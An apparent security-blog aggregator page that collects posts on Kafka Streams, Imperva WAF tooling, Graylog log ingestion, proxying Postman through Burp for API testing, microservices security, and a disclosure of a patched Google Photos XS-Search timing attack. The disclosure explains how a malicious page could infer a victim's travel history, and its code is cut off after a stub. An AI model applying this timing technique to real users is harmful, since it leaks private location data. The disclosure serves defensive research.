Our first use for the key-value store was to store auxiliary data that we needed for calculations. For example, in some cases our shared state is calculated based on a majority vote. The store allowed us to persist all the agents’ latest reports about the state of some object. Then, upon receiving a new report from some agent, we could persist it, retrieve all the other agents’ reports from the store and re-run the calculation.
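As an illustrative sketch (not Imperva's actual code), the majority-vote calculation can be modeled in plain Python, with a dict standing in for the Kafka Streams key-value store:

```python
from collections import Counter

# Stand-in for the persistent key-value store: object ID -> latest
# report per agent, e.g. {"site-1": {"agent-a": "under-attack"}}.
store = {}

def process_report(object_id, agent_id, reported_state):
    """Persist the agent's latest report, then recompute the shared
    state as a majority vote over all agents' latest reports."""
    reports = store.setdefault(object_id, {})
    reports[agent_id] = reported_state
    state, _count = Counter(reports.values()).most_common(1)[0]
    return state

process_report("site-1", "agent-a", "under-attack")
process_report("site-1", "agent-b", "ok")
print(process_report("site-1", "agent-c", "under-attack"))  # under-attack
```

Each new report overwrites that agent's previous one before the vote runs, mirroring the persist-then-recalculate flow described above.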

Illustration 4 below describes how we made the key-value store available to the process method of the processor, so we could use it when processing a new message.

Illustration 4: making the key-value store available to the process method of the processor (each shared state scenario then needs to implement the doProcess method)

Use case #2: creating a CRUD API on top of Kafka Streams

After our basic flow was in place, we sought to also provide a RESTful CRUD API in our shared state microservices. We wanted to allow retrieving the state of some/all objects, as well as setting/purging the state of an object (useful for backend maintenance).

To support the Get State APIs, whenever we calculate a state during processing, we persist it to the built-in key-value store. It then becomes quite easy to implement such an API using the Kafka Streams instance, as can be seen in the snippet below:

Illustration 5: using the built-in key-value store to quickly obtain the previously-calculated state of an object

Updating the state of an object via the API was also not difficult to implement. It basically involved creating a Kafka producer, and producing a record consisting of the new state. This ensured that messages generated by the API were treated in exactly the same way as those coming from other producers (e.g. agents).

Illustration 6: setting the state of an object can be done using a Kafka producer

Slight complication: multiple Kafka partitions

Next, we wanted to distribute the processing load and improve availability by having a cluster of shared state microservices per scenario. Set-up was a breeze: after configuring all instances to use the same application ID (and the same bootstrap servers), everything pretty much happened automatically. We also defined that each source topic would consist of several partitions, with the aim that each instance would be assigned a subset of these.

A word about preserving the state store, e.g. in case of failover to another instance, is in order here. Kafka Streams creates a replicated changelog Kafka topic (in which it tracks local updates) for each state store. This means that the state store is constantly backed up in Kafka. So if some Kafka Streams instance goes down, its state store can quickly be made available to the instance that takes over its partitions. Our tests showed that this happens in a matter of seconds, even for a store with millions of entries.
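The mechanics can be illustrated with a toy changelog replay in Python (a sketch of the idea only; Kafka Streams performs the replication and restoration internally):

```python
# Toy model of a changelog-backed store: every local update is also
# appended to a changelog; a takeover instance rebuilds the store by
# replaying that log from the beginning.
changelog = []  # stand-in for the replicated changelog topic in Kafka

def put(store, key, value):
    store[key] = value
    changelog.append((key, value))  # mirrored to the changelog

def restore():
    """Rebuild a fresh store from the changelog, as a takeover instance would."""
    store = {}
    for key, value in changelog:
        store[key] = value  # later entries overwrite earlier ones
    return store

primary = {}
put(primary, "site-1", "under-attack")
put(primary, "site-1", "ok")  # newer state for the same key
put(primary, "site-2", "ok")

standby = restore()
print(standby == primary)  # True
```

Because the changelog is itself a Kafka topic, the "replay" happens from replicated data, which is why a store with millions of entries can be brought up on another instance so quickly.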

Moving from one shared state microservice to a cluster of microservices made it less trivial to implement the Get State API. Now, each microservice’s state store held only part of the world (the objects whose key was mapped to a specific partition). We had to determine which instance held the specified object’s state and did this using the streams metadata, as can be seen below:

Illustration 7: we use streams metadata to determine which instance to query for the specified object’s state (a similar approach was taken for the GET ALL API)
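In spirit, the lookup behaves like the simplified Python sketch below; Kafka Streams resolves this via its streams metadata and its own partitioner, so the modulo hashing and instance names here are purely illustrative:

```python
# Simplified key-to-instance routing: keys map to partitions, and each
# instance owns a subset of partitions. The real service queries the
# Kafka Streams metadata instead of hashing by hand.
NUM_PARTITIONS = 6

def partition_for(key: str) -> int:
    # Deterministic stand-in for Kafka's partitioner.
    return sum(key.encode()) % NUM_PARTITIONS

# Partition assignment, normally maintained by Kafka's group coordinator.
assignment = {0: "instance-a", 1: "instance-a", 2: "instance-b",
              3: "instance-b", 4: "instance-c", 5: "instance-c"}

def instance_for(key: str) -> str:
    """Which microservice instance should be queried for this key's state."""
    return assignment[partition_for(key)]

print(instance_for("site-42"))  # instance-b
```

If the key maps to the local instance, the state is served from the local store; otherwise the request is forwarded to the owning instance.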

Main takeaways

  • Kafka Streams’ state stores can serve as a de facto distributed database, constantly replicated to Kafka
    • CRUD API can easily be built on top of it
    • Multiple partitions require a bit of extra handling
  • It’s also possible to add one or more state stores to a streams topology for the purpose of storing auxiliary data. It can be used to:
    • persist data that is needed for state calculation during stream processing
    • persist data that can be used during next init of the streams instance
    • much more…

These and other benefits make Kafka Streams a strong candidate for maintaining global state of a distributed system like ours. It has proven to be quite robust in our production environment (practically no lost messages since its deployment), and we look forward to expanding on its potential further!

The post Not just for Processing: How Kafka Streams as a Distributed Database Boosted our Reliability and Reduced Maintenance appeared first on Blog.

Radware Blog: Are Connected Cows a Hacker’s Dream?

Humans aren’t the only ones consumed with connected devices these days. Cows have joined our ranks. Believe it or not, farmers are increasingly relying on IoT devices to keep their cattle connected. No, not so that they can moo-nitor (see what I did there?) Instagram, but to improve efficiency and productivity. For example, in the […]

The post Are Connected Cows a Hacker’s Dream? appeared first on Radware Blog.

Radware Blog

Web-based Application Security Part 1: Open Redirection Vulnerability

Web application security, which applies specifically to the security of websites, web applications and web services, is increasingly becoming a top priority for organizations worldwide. To understand why, consider that one

The post Web-based Application Security Part 1: Open Redirection Vulnerability appeared first on The Cyber Security Place.

Infosecurity.US: New Firefox Browser To Feature Anti-Fingerprinting Capabilities

Um, no, not that kind of fingerprint…

Martin Brinkmann, writing as he does on gHacks, details a specific attribute to be included in the upcoming Firefox 67 release, slated for May 14th, 2019 (the date provided is somewhat 'fluid', as delays may require a reset on the claimed release date). At any rate, the specific release will include anti-fingerprinting technology.

"Fingerprinting refers to using data provided by the browser, e.g. automatically or by running certain scripts, to profile users. One of the appeals that fingerprinting has is that it does not require access to local storage and that some techniques work across browsers." - via Martin Brinkmann, writing on his blog


5 Ways To Demystify Zero Trust Security

Instead of only relying on security vendors’ claims about Zero Trust, benchmark them on a series of five critical success factors, with customer results being key. Analytics dashboards dominated

The post 5 Ways To Demystify Zero Trust Security appeared first on The Cyber Security Place.

Big tech poised to beat healthcare in reaping value from artificial intelligence, report says

Artificial intelligence will expose inefficiencies, improve medical decision-making and increase the quality of care, according to a new report from Boston Consulting Group. But the report also warned that companies

The post Big tech poised to beat healthcare in reaping value from artificial intelligence, report says appeared first on The Cyber Security Place.

Enterprises fear disruption to business critical applications, yet don’t prioritize securing them

The majority of organizations (nearly 70 percent) do not prioritize the protection of the applications that their businesses depend on – such as ERP and CRM systems – any differently than how low-value data, applications or services are secured. Even the slightest downtime affecting business critical applications would be massively disruptive, with 61 percent agreeing that the impact would be severe, according to the CyberArk survey conducted among 1,450 business and IT decision makers, primarily …

The post Enterprises fear disruption to business critical applications, yet don’t prioritize securing them appeared first on Help Net Security.

Enhance Imperva Cloud WAF with a New Management Tool in the Imperva GitHub

Imperva recently launched the Imperva GitHub where our global community can access tools, code repositories and other neat resources that aid collaboration and streamline development.

The nice thing about these tools is that you can clone them and customize them with whatever functionality you need. If you are nice you can also push new capabilities and even bug fixes  — we are not perfect 🙂 — back into the repository, so other Imperva users can benefit.

In this blog I will present the site-protection-viewer. It allows you to manage your Cloud WAF (formerly Incapsula) account by providing a summary of your web sites’ protection states, and also validates that your origin servers are protected (by restricting non-Imperva traffic). These capabilities are currently not available out of the box in Cloud WAF.

Usage is very simple: set your API_ID and API_KEY in the settings file and run a command in the command line. The output is two files (html and csv) that provide your site configurations and the state of the origin servers.

This tool is written in nodejs and uses its capability of running requests in parallel in order to shorten processing time. It uses the Incapsula API, which provides access to the account information.

Running the Tool is very Simple

Account Protection Example (html format)

You can see that origin servers are checked using http: and https: protocols. The Summary table can also be saved to a csv file depending on the settings (default is save).

Full Details (html format)

This section is added to the above if the showFullDetails flag is set to True in the settings file. The full details show the actual values that are returned by the Incapsula API for the specific site.

Why is it important to restrict traffic from non-Imperva networks?

Well, it is quite simple. Consider the following analogy. You have a house with a main door. Since you want to protect your house, you post a highly-trained guard at this door in order to grant entry to allowed personnel only. However, there is a catch! Your house has a small backdoor that is unlocked with no guard. Although you have invested a substantial amount of effort at the front door, an unauthorized person can still enter without being noticed and potentially wreak havoc in your house.

The same goes with the origin server IP addresses. You are well protected by Imperva on your main entry to the public internet via the DNS. However, if you don’t restrict (lock) your origin server from receiving direct traffic from the public internet, you are exposed to all the bad stuff you are paying to be protected from.
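For example, on an nginx origin you could allow only Imperva's networks and deny everything else. This is a hedged sketch: the CIDR below is a documentation placeholder (TEST-NET-1), not an actual Imperva range, so substitute the IP ranges Imperva publishes for your account.

```nginx
# Sketch: accept traffic only from Imperva's networks at the origin.
# 192.0.2.0/24 is a placeholder (TEST-NET-1); use Imperva's published ranges.
location / {
    allow 192.0.2.0/24;
    deny  all;
}
```

Firewall or security-group rules at the network layer achieve the same effect and are preferable where available.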

How to install the site protection viewer

Step 1: Install nodejs.

Step 2: Download the project files from the site-protection-viewer github repository and save them locally in a directory of your choice (aka project directory).

Step 3: In the project directory, open a command prompt and run ‘npm install’.

Step 4: Configure the relevant parameters in the settings.js file.
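For illustration only, the settings file might look something like the sketch below. Only API_ID, API_KEY and showFullDetails are mentioned in this post; every other field name here is a hypothetical guess, so check the settings.js that ships with the repository for the authoritative parameters.

```javascript
// Hypothetical sketch of settings.js; field names other than API_ID,
// API_KEY and showFullDetails are illustrative guesses.
module.exports = {
  API_ID: '12345',           // your Cloud WAF (Incapsula) API ID
  API_KEY: 'your-api-key',   // your Cloud WAF API key
  showFullDetails: true,     // include the full per-site details section
  outputDir: './output'      // hypothetical: where the html/csv files go
};
```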

Step 5: In the project directory run command: ‘node spv’.

Output files can be found in the configured directory.


site-protection-viewer provides you with a summary of the protection states of the web sites managed by Cloud WAF. Simply download the tool, configure a couple of settings, and run a command. If you want, you can use the code of this tool to develop custom-made tools that you can contribute back to the community.

If you want some more neat stuff to help you manage your account, check out the account-level-dashboard tool which provides a graphic dashboard of some of your Cloud WAF account settings.

The post Enhance Imperva Cloud WAF with a New Management Tool in the Imperva GitHub appeared first on Blog.

The Five Most Startling Statistics from this 2019 Global Survey of 1,200 Cybersecurity Pros [Infographic]

For those of us in the security industry, the annual Cyberthreat Defense Report is a gold mine of insights into the minds of IT security professionals, including what threats keep them up at night, and how they plan to defend against them.

The 6th edition of the report from the CyberEdge Group was just published.

I was able to get a sneak peek at the 2019 report. At 43 pages, it is comprehensive without being over-long. It’s also chock-full of useful charts and graphics depicting the results of the survey, which included 1,200 IT security decision makers and practitioners from around the globe from 19 different industries.

There’s no shortage of interesting findings. Here are some of the ones that jumped out at me:

  1. No organization is immune from attack. 2018 was the first year in which the percentage of organizations hit by one or more successful cyberattacks actually fell year-over-year. That decrease was short-lived. The percentage of organizations breached in the past year increased again year-over-year to 78% in the 2019 survey. Worse, 32% of businesses reported being breached 6+ times in the last 12 months, up from 27% the year before. That’s a nearly 20% increase — HUGE in my mind.
  2. The two most-wanted security technologies revolve around smarter software. Security teams are swamped with too much data, not enough intelligence; too many meaningless events, not enough ability to detect the true threats. No wonder that advanced security analytics and threat intelligence services are at the top of the list of the most-desired technologies by security professionals.
  3. Web Application Firewalls (WAFs) rule. For the 2nd year in a row, respondents to the CyberEdge survey said WAFs (63%) were their most widely-deployed application and data security technology. That doesn’t surprise us at Imperva, where we take pride in the ability of our WAF — named a Leader by Gartner five years in a row — and app security solutions to prevent DDoS attacks, data breaches, and more. We also take pride in their flexibility, enabling enterprises to deploy them on-premises, in AWS and Azure, or as a cloud service.  
  4. The two security processes businesses struggle with most. They are 1) secure application development and testing, and 2) detection of insider attacks. Because as powerful as WAFs are, they are best at protecting the metaphorical walls of your business from outside attack, but not as optimized for either emerging threats or attacks involving trusted employees who have been compromised or are malicious. Data Security and RASP (Runtime Application Self-Protection) solutions can fill in these security gaps. Subscribers to Imperva’s FlexProtect plans enjoy the ability to quickly deploy such solutions and/or move them between servers and cloud instances as needed.
  5. Machine learning and AI are making an impact TODAY. Who says AI is a coming technology? Four out of five respondents said they believe machine learning and AI are making a difference in the battle to detect cyberthreats. How? By analyzing and automating the processing of millions of security events, filtering out meaningless ones, and distilling the rest into several actionable insights that security pros can quickly act on. That of course is just what our Imperva data risk analytics and attack analytics help provide.

Below is an infographic depicting some other headline findings:

2019 CyberThreat Defense Report infographic on cybersecurity

Learn more by getting your complimentary copy of the CyberEdge Cyberthreat Defense Report. Download here.

And sign up for our webinar on April 10, 8 am PT, where Imperva senior product marketing manager Sara Pan will discuss the findings with Mark Bouchard, COO of the CyberEdge Group.

The post The Five Most Startling Statistics from this 2019 Global Survey of 1,200 Cybersecurity Pros [Infographic] appeared first on Blog.

How to Lift the Veil on Mobile Application Security Threats

Mobile applications have revolutionized the way we consume information. Nowadays, most organizations leverage these powerful tools to enhance their employees’ agility with services that are available 24/7. But granting applications access to highly sensitive corporate data also widens the mobile attack surface, which is why it’s crucial to not overlook the associated application security threats.

Mobile Apps Complicate the Data Privacy Picture

A mobile application is like an iceberg; most of its behaviors are executed silently. On one hand, it can be inherently malicious and feature malware that, when hosted on a device, targets the user’s data, credentials, transactions and more. These behaviors are mostly found in applications available on third-party stores, but sometimes also in major commercial app stores. In 2019, Pradeo Lab discovered that 5 percent of Android and 2 percent of iOS apps hosted malicious programs.

On the other hand, a mobile application doesn’t need to be malicious to hurt collaborators’ privacy. Greyware is a category of application that comprises intrusive apps that exfiltrate user data to the network (67 percent of Android apps and 61 percent of iOS apps) as well as vulnerable apps developed without following security best practices (61 percent of Android apps).

Either way, mobile apps have the power to severely compromise corporate data privacy. Today, security heads are stuck with the major challenge of complying with data privacy laws and enhancing user productivity while preserving their agility.

Shed Light on Mobile Application Security Threats in Your Network

Organizations that distribute mobile apps are encouraged — and required by law in some industries — to diagnose their security levels prior to release. To shed light on all aspects of a mobile app, it is necessary to audit it with a mobile application security testing (MAST) tool. MAST solutions perform multidimensional analyses (static and dynamic) that allow security teams to detect all app behaviors and vulnerabilities. This way, organizations can ensure that the apps they are about to release do not threaten the privacy of any corporate or personal data. If they do, this process will help the relevant parties repackage them.

MAST solutions are available as software-as-a-service (SaaS) and sometimes as an application programming interface (API) to integrate within developers’ environments. In addition, some unified endpoint management (UEM) solutions are starting to integrate this kind of service within their platform to facilitate security heads’ experience.

Register for the webinar to learn more

The post How to Lift the Veil on Mobile Application Security Threats appeared first on Security Intelligence.

Less than 20% of IT pros have complete access to critical data in public clouds

Companies have low visibility into their public cloud environments, and the tools and data supplied by cloud providers are insufficient. Lack of visibility can result in a variety of problems including the inability to track or diagnose application performance issues, inability to monitor and deliver against service-level agreements, and delays in detecting and resolving security vulnerabilities and exploits. A survey sponsored by Ixia, on ‘The State of Cloud Monitoring’, was conducted by Dimensional Research and …

The post Less than 20% of IT pros have complete access to critical data in public clouds appeared first on Help Net Security.

The privacy risks of pre-installed software on Android devices

Many pre-installed apps facilitate access to privileged data and resources, without the average user being aware of their presence or being able to uninstall them. On the one hand, the permission model on the Android operating system and its apps allow a large number of actors to track and obtain personal user information. At the same time, it reveals that the end user is not aware of these actors in the Android terminals or of …

The post The privacy risks of pre-installed software on Android devices appeared first on Help Net Security.

Imperva Cloud WAF and Graylog, Part II: How to Collect and Ingest SIEM Logs

This guide gives step-by-step guidance on how to collect and parse Imperva Cloud Web Application Firewall (WAF, formerly Incapsula) logs into the Graylog SIEM tool. Read Part I to learn how to set up a Graylog server in AWS and integrate with Imperva Cloud WAF.

This guide assumes:

  • You have a clean Graylog server up and running, as described in my earlier blog article
  • You are pushing (or pulling) the Cloud WAF SIEM logs into a folder within the Graylog server
  • You are not collecting the logs yet

Important! The steps below apply for the following scenario:

  • Deployment as a stand-alone EC2 in AWS
  • Single-server setup, with the logs located on the same server as Graylog
  • The logs are pushed to the server uncompressed and unencrypted

Although this guide was created for a deployment on AWS, most of the steps below apply to other setups (other clouds, on-premises) as well, with a few networking changes.

This article will detail how to configure the log collector and parser in a few major steps:

  • Step 1: Install the sidecar collector package for Graylog
  • Step 2: Configure a new log collector in Graylog
  • Step 3: Create a log input and extractor with the Incapsula content pack for Graylog (the JSON with the parsing rules)

Step 1: Install the Sidecar Collector Package

  1. Install the Graylog sidecar collector

Let’s first download the appropriate package. Identify the sidecar collector package suited to our deployment on GitHub:

Since we are deploying Graylog 2.5.x, the corresponding sidecar collector version is 0.1.x.

Go ahead and install the relevant package.

We are running a 64-bit server, and .deb packages work best with Debian/Ubuntu machines.

Run the following commands:

  1. Change to a working directory:

cd /tmp   # or any directory you would like to use

  2. Download the package (append the package URL from the GitHub releases page):

curl -L -O

  3. Install the package:

sudo dpkg -i collector-sidecar_0.1.7-1_amd64.deb

2. Configure the sidecar collector

cd /etc/graylog/collector-sidecar

sudo nano collector_sidecar.yml

Now let’s change the server URL to the local server IP (the private IP, not the AWS public IP), and add incapsula-logs to the tags:
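As an illustrative sketch (the IP placeholder and tag values below are assumptions; adjust them to your install), the relevant lines of collector_sidecar.yml would look something like:

```yaml
# /etc/graylog/collector-sidecar/collector_sidecar.yml (excerpt)
server_url: http://<graylog-private-ip>:9000/api/   # local/private IP, not the AWS public IP
tags:
    - linux
    - incapsula-logs
```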

And let’s install and start graylog-collector-sidecar service with the following commands:

sudo graylog-collector-sidecar -service install
sudo systemctl start collector-sidecar

Step 2: Configure a New Log Collector in Graylog

3. Add a collector in Graylog

Follow the steps below to add a collector:

  • System > Collectors
  • Click Manage Configurations
  • Then click Create configuration

Let’s name it and then click on the newly-created collector:

4. Add Incapsula-logs as a tag

5. Configure the Output and then the Input of the collectors

Click on Create Output and configure the collector as below:

Now click on Create Input and configure the collector as below:

Step 3: Creating Log Inputs and Extractors with Incapsula (now named Imperva Cloud Web Application Firewall) Content Pack for Graylog

6. Let’s now launch a new Input as below:

And configure the Beats collector inputs as required:

The TLS details are not mandatory at this stage as we will work with unencrypted SIEM logs for this blog.

7. Download the Incapsula SIEM package for Graylog in Github

Go to the following link.

Retrieve the JSON configuration of the package. It includes all the Imperva Cloud Web Application Firewall (formerly Incapsula) parsing rules for event fields, which allows an easy import into Graylog along with clear field naming.

Extract the content_pack.json file and import it as an extractor in Graylog.

Go to System > Content packs and import the JSON file you just downloaded:

The content pack will use our legacy name (Incapsula). We can now apply the new content pack as below:

The new content pack will be displayed in the Graylog System > Inputs menu, from which you can extract its content by clicking “Manage extractors”:

You can now import the predefined extractors into the input we previously configured.

Paste the content of Incapsula content pack extractor:

If all works as expected, you should get the confirmation as below:

You should now see that the headers to be parsed by Graylog have been successfully imported with appropriate naming, as shown in the screenshot below:

Field extractors for Incapsula (or Imperva Cloud WAF) events in Graylog SIEM:

8. Restart the sidecar collector service

Once all is configured you can restart the sidecar service with the following command in the server command line:

sudo systemctl restart collector-sidecar

We can also configure the sidecar collector to run at server startup:

sudo systemctl enable collector-sidecar 

Let’s check that the collector is active and the service is properly running:

The collector service should now appear as active in Graylog:

9. Check that you see messages and logs

Click on the Search bar. After a few minutes you should start to see the logs displayed.

Give it 10-15 minutes before troubleshooting if you don’t see messages displayed immediately.

You can see on the left panel that the filters and retrieved headers are in line with Imperva: Client_IP is retrieved from the Incap-Client-IP header and contains the real client IP, Client App is the client classification detected by Imperva Cloud WAF, and so on.

Each of these headers is explained below:

10. Congratulations!

Congratulations, we are now successfully exporting, collecting and parsing Imperva Cloud WAF/Incapsula SIEM logs!

In the next article, we will review the imported Imperva Cloud WAF dashboard template.

If you have suggestions for improvements or updates in any of the steps, please share with the community in the comments below.

The post Imperva Cloud WAF and Graylog, Part II: How to Collect and Ingest SIEM Logs appeared first on Blog.

Better API Penetration Testing with Postman – Part 2

In Part 1 of this series, I walked through an introduction to Postman, a popular tool for API developers that makes it easier to test API calls. We created a collection, and added a request to it. We also talked about how Postman handles cookies – which is essentially the same way a browser does. In this part, we’ll tailor it a bit more toward penetration testing, by proxying Postman through Burp. And in the upcoming parts 3 and 4, we’ll deal with more advanced usage of Postman, and using Burp Extensions to augment Postman, respectively.

Why proxy?

By using Postman, we get its benefits as a superior tool for crafting requests from scratch and managing them. By proxying it through Burp, we gain Burp’s benefits: we can fuzz with Intruder, the passive scanner highlights issues for us, we can leverage Burp extensions (as we will see in Part 4 of this series), and we can use Repeater for request tampering. Yes, it’s true that we could do our tampering in Postman, but there are two strong reasons to use Repeater instead: 1) Postman is designed to issue correct, valid requests, and under some circumstances it will try to correct malformed syntax; when testing for security issues, we may not want it correcting us. 2) By using Repeater, we maintain a healthy separation between our clean-state request in Postman and our tampered requests in Repeater.

Setting up Burp Suite

An actual introduction to Burp is outside the scope of this particular post. If you’re reading this, it’s likely you’re already familiar with it; we aren’t doing anything exotic or different for API testing.
If you’re unfamiliar with it, here are some resources:

Now, launch Burp, check the Proxy -> Options tab.
The top section is Proxy Listeners, and you should see a listener on port 8080. It must be Running (note the checkbox). If it’s not running by default, that typically means the port is not available, and you will want to change the listener (and Postman) to a different port. As long as Burp is listening on the same port Postman is trying to proxy through, your setup should work.

Also check the Proxy -> Intercept tab and verify that Intercept is off.

Configuring Postman to Proxy through Burp

Postman is proxy-aware, which means we can point it at our man-in-the-middle proxy: Burp Suite (my tool of choice) for this post. We’ll open the Settings dialog by clicking the Wrench icon in the top-right (1) and then the Settings option on its drop-down menu (2).
This will open a large Settings dialog with tabs across the top for the different categories of settings. Locate the Proxy tab and click it to navigate.

Opening the Postman Settings pane

There are 3 things to do on this tab:

  1. Turn On the Global Proxy Configuration switch.
  2. Turn Off the Use System Proxy switch.
  3. Set the Proxy Server IP address and port to match your Burp Suite proxy interface.
Proxy Settings Tab – Pointing Postman at your Burp Suite listener

The default proxy interface will be port 8080, assuming you are running Burp Suite on the same machine as Postman. If you want to use a different port, you will need to specify it here and make sure it’s set to match the proxy interface in Burp.

Now that you are able to proxy traffic, there’s one more hurdle to consider. Today, SSL/TLS is used on most public APIs. This is a very good thing, but it means that when Burp man-in-the-middles Postman’s API requests and responses, you will get certificate errors unless your Burp certificate authority (CA) is trusted by your system. There are two options to fix this:

  1. You can turn off certificate validation in Postman. Under the General settings tab, there’s an SSL certification verification option. Setting it to Off will make Postman ignore any certificate issues, including the fact that your Burp Suite instance’s PortSwigger CA is untrusted.
  2. You can trust your Burp Suite CA to your system trust store. The specifics of how to do this are platform specific.
    PortSwigger’s documentation for it is here:

Verify that it is working

Issue some requests in Postman. Check your HTTP History on the Proxy tab in Burp.

Proxy history in Burp Suite


  • Your request is stalling and timing out? Verify that Intercept is Off on the Proxy tab in Burp. Check that your proxy settings in Postman match the Proxy Interface in Burp.
  • Postman is getting responses but they aren’t showing in the Proxy History (etc) in Burp? Check the Settings in Postman to verify that Global Proxy Config is turned on. Make sure you haven’t activated a filter on the History in Burp that would filter out all of your requests. Also make sure your scope is set, if you’re not capturing out-of-scope traffic.

Next Steps

So this was two posts of pretty elementary setup activity. Now that we have our basic tool chain set up, we’re ready for some more advanced material. Part 3 will deal with variables in Postman and how they can simplify your life. It will also dig into the scripting interface and how to use it to simplify interactions with common, modern approaches to auth, such as bearer tokens.

Securing the Microservices Architecture: Decomposing the Monolith Without Compromising Information Security

In the world of software development, microservices is a variant of service-oriented architecture (SOA). It is an architectural style in which software applications that are typically built as monoliths and run in a single process are decomposed into smaller parts. Each of these parts is called a microservice, and each runs independently in its own process.

Creating a mental picture of monolith versus microservices is relatively easy:

Securing the Microservices Infrastructure

Microservices is a great way to redefine large-scale software projects because it is more flexible and allows for on-demand scalability and much shorter release cycles. As a result, forward-thinking organizations have been increasingly moving to the microservices development style. With this architecture’s fine-grained services and lightweight protocols, it can help teams increase product modularity, making applications easier to develop, test, deploy, modify and maintain over time.

Microservices is also good for scalability. If teams want to scale up one component, they can do that without having to scale the entire project. Scaling up can therefore be a lot faster and less costly.

It might sound like microservices is a cure-all for software development woes. But like any other domain, it has its disadvantages; moving to microservices adds complexity and security implications. Regardless of how an application is designed, major gaps could potentially be introduced on the platform level. In microservices, security concerns can get exacerbated due to the various network connections and application programming interfaces (APIs) used to forge communication channels between the components of the microservice architecture. Another issue is that, if not properly designed, the standardized replicable nature of containers could spread out any vulnerability manyfold.

From managing user access to the code all the way to implementing a distributed firewall, one thing is clear: Ditching monolith for microservices may be right for your organization, but the relevant security considerations must be addressed early in the process.

The Microservices Trinity: Cloud, Containers and DevOps

Microservices are containerized and accessed on scale via cloud infrastructures. To make microservices flow effectively, organizations must adopt a DevOps culture where small, multidisciplinary teams work autonomously, applying Agile methodologies and including operations in their scope of responsibility.

This combination of factors can increase overall security risk for the organization in general and, more specifically, through the phases of a microservice-based application project: planning, development and post-deployment operations in cloud-hosted architectures.

Key Concerns: Knowing Where to Look First

In general, organizations nowadays are aware of their overall risk appetite and know that new projects always introduce new risk considerations. With a move to microservices, we are looking at a gradual process that breaks one large, monolithic project into smaller parts, each of which needs to be managed as its own project. Below are a few key concerns to look out for when operating a microservices architecture.

The Need for Isolation
Isolation is at the core of the microservices concept. To be an autonomous piece of the overall application puzzle, a microservice needs to be its own island in a sense — architected, created, deployed, maintained, modified, scaled and, eventually, retired without affecting any of the other microservices around it.

One area where isolation is much-needed is on the database level. Monolithic applications where every part of the application can access any part of the databases can, over time, impact performance due to deadlocks, row locks and errors. Microservices, in contrast, can avoid that if isolation is applied — for example, if it is decided that only one microservice will access one data store and integration with the entire database is eliminated. In a security sense, that means more microservices and more data stores to secure. But if done correctly, one microservice will not be able to access the data of another and, if compromised, it will not give way to an attacker moving laterally.

Another area that requires isolation is deployment. The goal is to ensure that each microservice is deployed without impacting others around it and, should it fail, that the effect would not bring down other microservices as well. The biggest challenge typically applies to multitenant applications, which require isolation on both the microservices and data levels, such as in software-as-a-service (SaaS) scenarios.

A Preference for Hybrid Clouds

Developing at scale usually takes place in the cloud, and most organizations have been doing it for years now. That can also mean that any given organization operates different parts of its infrastructure on different clouds with different vendors. Securing microservices will therefore have to be cloud-agnostic and applicable to any environment, with relevant controls in place to achieve uniform effectiveness across the various cloud infrastructures.

Insecure DevOps Tool Sets

There are some great open-source tool sets out there built for DevOps teams, and they can be used in most Agile developments. What these tools may not always offer is proper security. Integrating open-source tools into the team’s projects requires assessing exposure and adapting controls ahead of integration, as well as reevaluating them over time. Open-source also means access for all, and that often gives way to opportunities for attackers to plant or exploit vulnerabilities and infect tools with malicious code.

Interservice Communications

Interservice communication is typically not a good idea for projects that exist autonomously, but in some cases it is necessary. These channels can be risky and costly if not designed and implemented properly. Securing interservice communications calls for high standards and encryption on the data level where needed.

Managing Data Layers

Each microservice manages its own data. As a result, data integrity and consistency become critical security challenges to reckon with. This is partly because of the intricacy in planning data stores to keep entries once in each store, avoiding redundancy. One store can keep a reference to a piece of data stored elsewhere, but it should not be duplicated across many stores. From a security viewpoint, we are looking at the CIA triad of confidentiality, integrity, availability — all of which must be managed correctly to provide the organization with better levels of performance and continuity than it had in its monolithic days.

Dive Into Microservice Security

Microservice architectures bring agility, scalability and consistency to the development platform. However, security in these environments often lags behind.

A major concern we face in that domain is imposing the right level of isolation based on application type, platform and data in context. We also look at privacy, regulatory concerns and possible security automation to incubate within the DevOps life cycle.

Though DevOps has already made some strides toward integrating security into the development life cycle, there’s still significant work to be done in this space.

Want to learn more? Check out our paper, “Securing Microservice Architectures — A Holistic Approach.”

The post Securing the Microservices Architecture: Decomposing the Monolith Without Compromising Information Security appeared first on Security Intelligence.

Now-Patched Google Photos Vulnerability Let Hackers Track Your Friends and Location History

A now-patched vulnerability in the web version of Google Photos allowed malicious websites to expose where, when, and with whom your photos were taken.

One trillion photos were taken in 2018. With image quality and file size increasing, it’s obvious why more and more people choose to host their photos on services like iCloud, Dropbox and Google Photos.

One of the best features of Google Photos is its search engine. Google Photos automatically tags all your photos using each picture’s metadata (geographic coordinates, date, etc.) and a state-of-the-art AI engine, capable of describing photos with text, and detecting objects and events such as weddings, waterfalls, sunsets and many others. If that’s not enough, facial recognition is also used to automatically tag people in photos. You could then use all this information in your search query just by writing “Photos of me and Tanya from Paris 2018”.

The Threat

I’ve used Google Photos for a few years now, but only recently learned about its search capabilities, which prompted me to check for side-channel attacks. After some trial and error, I found that the Google Photos search endpoint is vulnerable to a browser-based timing attack called Cross-Site Search (XS-Search).

In my proof of concept, I used the HTML link tag to create multiple cross-origin requests to the Google Photos search endpoint. Using JavaScript, I then measured the amount of time it took for the onload event to trigger. I used this information to calculate the baseline time — in this case, timing a search query that I know will return zero results.

Next, I timed the following query “photos of me from Iceland” and compared the result to the baseline. If the search time took longer than the baseline, I could assume the query returned results and thus infer that the current user visited Iceland.

As I mentioned above, the Google Photos search engine takes into account the photo metadata. So by adding a date to the search query, I could check if the photo was taken in a specific time range. By repeating this process with different time ranges, I could quickly approximate the time of the visit to a specific place or country.

Attack Flow

The video below demonstrates how a third-party site can use time measurements to extract the names of the countries you took photos in. The first bar in the video, named “controlled,” represents the baseline timing of an empty results page. Any time measurement above the baseline indicates a non-empty result, i.e., the current user has visited the queried country.

For this attack to work, we need to trick a user into opening a malicious website while logged into Google Photos. This can be done by sending the victim a direct message on a popular messaging service or email, or by embedding malicious JavaScript inside a web ad. The JavaScript code will silently generate requests to the Google Photos search endpoint, extracting Boolean answers to any query the attacker wants.

This process can be incremental, as the attacker can keep track of what has already been asked and continue from there the next time the victim visits one of their malicious websites.

You can see below the timing function I implemented for my proof of concept:

Below is the code I used to demonstrate how users’ location history can be extracted.
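The original snippets were published as images. As a rough sketch of the technique (not the author’s exact code; the search URL, the zero-result query, and the 1.5x threshold are illustrative assumptions), a browser-based timing probe of this kind might look like:

```javascript
// Illustrative XS-Search timing probe; a sketch, not the original PoC.

// Time how long a cross-origin search page takes to load via a <link>
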